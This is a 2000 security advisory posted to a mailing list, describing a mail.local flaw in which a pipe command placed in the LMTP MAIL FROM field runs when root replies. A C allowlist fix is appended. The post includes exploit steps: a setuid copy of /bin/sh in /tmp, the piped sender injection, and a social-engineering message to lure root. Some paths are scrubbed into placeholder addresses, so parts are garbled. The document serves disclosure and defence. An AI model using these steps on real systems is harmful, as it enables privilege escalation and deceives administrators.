vulnerability in mail.local
From: gregory duchemin <c3rb3r () HOTMAIL COM>
Date: Wed, 1 Nov 2000 18:57:10 GMT
mail.local is a little setuid root prog designed, like its name suggests, for
local mail delivery.
Used with the -l option, we have an interactive mode in the LMTP protocol (a
simplified SMTP for local mail delivery only).
A weakness exists in the 'mail from' field that allows any local user to
insert a piped shell command that may be executed
by the recipient when he replies with the mail command. A little
social engineering skill should help to root the box.
Finally, mail.local shouldn't allow such escape chars even in the mail from
field, and the mail command shouldn't allow such
a reply through a pipe.
A space char in the command will finish the string, so either you use a single
command like '|reboot' or use a comma, which should
be converted to a space by mail.
The Linux 2.4.0 beta Caldera that was freely distributed during DEF CON 00 is
vulnerable to this problem.
That looks like the old sendmail bugs.
cp /bin/sh /tmp/newsh
chmod a+rws /tmp/newsh
#cp exploit /firstname.lastname@example.org
#chmod a+x /email@example.com
mail from:<|/firstname.lastname@example.org> You can use many senders to hide the evil
Subject:I have a problem
I need higher privilege on this machine, can you do something for me please ?
(now wait for a reply, and then:)
#echo 'very nice, thanx a lot' | mail -s 'thanx' root // With
Have a nice day,
1001 bd Maisonneuve Ouest, suite 200
Montreal (Quebec) H3A 3C8 CANADA
c3rb3r () hotmail com
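As an added example (not code from the post or from mail.local itself), an allowlist check in C for the LMTP MAIL FROM field of the kind the post says mail.local should perform: it rejects pipe addresses and shell metacharacters, including the comma-for-space variant described above, and goes slightly beyond the post by also refusing a leading '/' or '-' (a path or a command-line option). The function names and the accepted character set are assumptions.

```c
/* Added example, not mail.local's own code: an allowlist check for the
 * address in an LMTP "MAIL FROM:<...>" line. Function names and the
 * accepted character set are assumptions for illustration. */
#include <ctype.h>
#include <stddef.h>
#include <string.h>
#include <strings.h>

/* Returns 1 if addr is an acceptable envelope sender, 0 otherwise.
 * Only "local" or "local@domain" built from letters, digits and @ . _ - +
 * passes; the pipe, every shell metacharacter, whitespace and the comma
 * (which the mail command may turn into a space) are all outside the
 * allowlist. A leading '|', '/' or '-' is refused explicitly so that a
 * pipe, a path or a command-line option can never be handed on. */
int sender_is_safe(const char *addr)
{
    size_t len = strlen(addr);
    if (len == 0 || len > 255) return 0;
    if (addr[0] == '|' || addr[0] == '/' || addr[0] == '-') return 0;
    for (const char *p = addr; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (c < 0x20 || c >= 0x7f) return 0;          /* control / non-ASCII bytes */
        if (!isalnum(c) && strchr("@._-+", c) == NULL) return 0;
    }
    return 1;
}

/* Parses "MAIL FROM:<addr>" (verb case-insensitive, brackets optional),
 * copies the address into out and returns 1 only if it is safe.
 * The empty reverse path "<>" used by bounces is accepted. */
int parse_mail_from(const char *line, char *out, size_t outsz)
{
    const char *p = line;
    size_t n = 0;
    int bracket;

    if (outsz == 0 || strncasecmp(p, "MAIL FROM:", 10) != 0) return 0;
    p += 10;
    while (*p == ' ') p++;
    bracket = (*p == '<');
    if (bracket) p++;
    while (*p && *p != '>' && *p != ' ' && *p != '\r' && *p != '\n' && n + 1 < outsz)
        out[n++] = *p++;
    out[n] = '\0';
    if (bracket && *p != '>') return 0;   /* unterminated or overlong address */
    if (n == 0) return bracket;           /* "<>" is fine, a bare empty field is not */
    return sender_is_safe(out);
}
```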